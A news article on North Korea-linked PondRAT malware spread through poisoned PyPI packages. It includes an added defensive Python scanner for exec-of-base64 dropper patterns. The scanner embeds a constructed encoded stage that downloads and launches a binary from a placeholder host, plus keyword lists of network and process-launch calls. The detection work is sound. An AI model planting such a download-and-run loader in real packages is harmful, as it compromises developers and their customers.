Threat actors linked to North Korea have used poisoned Python packages as a way to deliver new malware called PondRAT as part of an ongoing campaign.
According to new findings from Palo Alto Networks Unit 42, PondRAT is believed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor previously attributed to the Lazarus Group and deployed in attacks tied to the 3CX supply chain compromise last year.
Some of these attacks are part of an ongoing cyberattack campaign called Operation Dream Job, in which potential targets are lured with enticing job offers in an attempt to get them to download malware.
“The attackers behind this campaign uploaded several poisoned Python packages to PyPI, a popular open source Python package repository,” said Unit 42 researcher Yoav Zemach, linking the activity with moderate confidence to a threat actor the company tracks as Gleaming Pisces.
The adversary is also tracked by the wider cybersecurity community under the names Citrine Sleet, Labyrinth Chollima, Nickel Academy and UNC4736, a sub-cluster within the Lazarus Group that is also known for distributing the AppleJeus malware.
The ultimate goal of the attacks is believed to be “providing access to supply chain vendors through developer endpoints and subsequently gaining access to those vendors' customer endpoints, as seen in previous incidents.”
The list of malicious packages removed from the PyPI repository is given below –
The chain of infection is simple: once the packages are downloaded and installed on a developer system, they execute an encoded next stage, which in turn retrieves the Linux and macOS versions of the RAT from a remote server and launches them.
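The staging pattern described above (a literal blob decoded at import or install time, handed to exec, and a decoded stage that fetches and launches a binary) is something a defender can look for statically in third-party packages before they reach a developer machine. The following Python scanner is an added example written for this page; it is not code from Unit 42, from the article, or from the malicious packages themselves. The sample "package" source, the placeholder URL (example.invalid) and the function names are all constructed for illustration and are not indicators from the campaign.

```python
import ast
import base64

# Constructed sample of the staging pattern the article describes. This is NOT the
# real PondRAT loader: an encoded blob is decoded and exec'd, and the decoded stage
# downloads a file from a remote host (placeholder .invalid domain) and runs it.
STAGE2 = b'''
import urllib.request, os, subprocess, tempfile
url = "http://example.invalid/payload"          # placeholder, not a real indicator
path = os.path.join(tempfile.gettempdir(), ".cache")
urllib.request.urlretrieve(url, path)
os.chmod(path, 0o755)
subprocess.Popen([path])
'''
SUSPICIOUS_INIT = "import base64\nexec(base64.b64decode(%r))\n" % base64.b64encode(STAGE2).decode()

# Constructed benign module for comparison.
BENIGN_INIT = '''
import json
def load(p):
    with open(p) as f:
        return json.load(f)
'''

DECODERS = {"b64decode", "b32decode", "a85decode", "decompress", "unhexlify"}
EXEC_SINKS = {"exec", "eval"}
NET_CALLS = {"urlopen", "urlretrieve", "create_connection", "request"}
PROC_CALLS = {"Popen", "call", "run", "system", "execv", "execve", "spawn"}


def _call_name(node):
    """Return the bare callee name of an ast.Call (exec, b64decode, Popen, ...)."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return ""


def _decoded_literal_stages(tree):
    """Yield the bytes of every base64 string literal passed straight to b64decode."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _call_name(node) == "b64decode" and node.args:
            arg = node.args[0]
            if isinstance(arg, ast.Constant) and isinstance(arg.value, (str, bytes)):
                try:
                    yield base64.b64decode(arg.value, validate=True)
                except Exception:
                    pass  # not clean base64; leave it for manual review


def scan_source(src, depth=0):
    """Return findings for one module, recursing into decodable literal stages."""
    findings = []
    try:
        tree = ast.parse(src)
    except SyntaxError:
        return [f"stage{depth}: unparseable (possibly obfuscated) source"]
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in EXEC_SINKS and node.args:
            # exec()/eval() whose argument is itself a decoder call: classic dropper shape
            inner = node.args[0]
            if isinstance(inner, ast.Call) and _call_name(inner) in DECODERS:
                findings.append(f"stage{depth}: {name}() on {_call_name(inner)}() output")
        elif name in NET_CALLS:
            findings.append(f"stage{depth}: network fetch via {name}()")
        elif name in PROC_CALLS:
            findings.append(f"stage{depth}: process launch via {name}()")
    if depth < 3:  # bound recursion in case stages nest
        for blob in _decoded_literal_stages(tree):
            findings.extend(scan_source(blob.decode("utf-8", "replace"), depth + 1))
    return findings


def is_suspicious(src):
    """Flag a module that exec's decoded data AND (in any stage) fetches or launches."""
    f = scan_source(src)
    has_exec = any("exec()" in x or "eval()" in x for x in f)
    has_fetch = any("network fetch" in x for x in f)
    has_launch = any("process launch" in x for x in f)
    return has_exec and (has_fetch or has_launch)


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_INIT), ("benign", BENIGN_INIT)):
        print(label, is_suspicious(src), scan_source(src))
```

Point it at `setup.py` and every `__init__.py` under a wheel or sdist before installing it (or at `site-packages` after the fact). The heuristic is deliberately coarse: it only follows base64 literals one layer deep per stage and will miss stages that are XOR-ed, compressed with a key, or fetched rather than embedded, so a clean result is not a clean bill of health, but a hit on an `exec(b64decode(...))` dropper whose decoded stage downloads and spawns a binary is worth blocking on sight.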
Further analysis of PondRAT revealed similarities to both POOLRAT and AppleJeus, with the attacks also distributing new Linux variants of POOLRAT.
“The Linux and macOS (POOLRAT) versions use the same function structure to load their configurations, showing similar method names and functionality,” Zemach said.
“Also, the method names in both variants are surprisingly similar, and the strings are almost identical. Finally, the mechanism that processes the commands from (the command and control server) is almost identical.”
PondRAT, a leaner version of POOLRAT, comes with the ability to upload and download files, pause operations for a preset time interval, and execute arbitrary commands.
“Evidence of additional POOLRAT variants for Linux showed that Gleaming Pisces extends its capabilities on both Linux and macOS platforms,” Unit 42 said.
“The weaponization of legitimate-looking Python packages across multiple operating systems poses a significant risk to organizations. Successful installation of malicious third-party packages can lead to malware infections that compromise the entire network.”
The disclosure comes as KnowBe4, which was tricked into hiring a North Korean threat actor as an employee, said more than a dozen companies “either hired North Korean employees or were besieged by numerous fake resumes and applications submitted by North Koreans hoping to gain employment with their organization.”
It described the activity, which CrowdStrike tracks under the moniker Famous Chollima, as a “complex, industrial, large-scale national government operation” that poses “a serious risk to any company with employees who work only remotely.”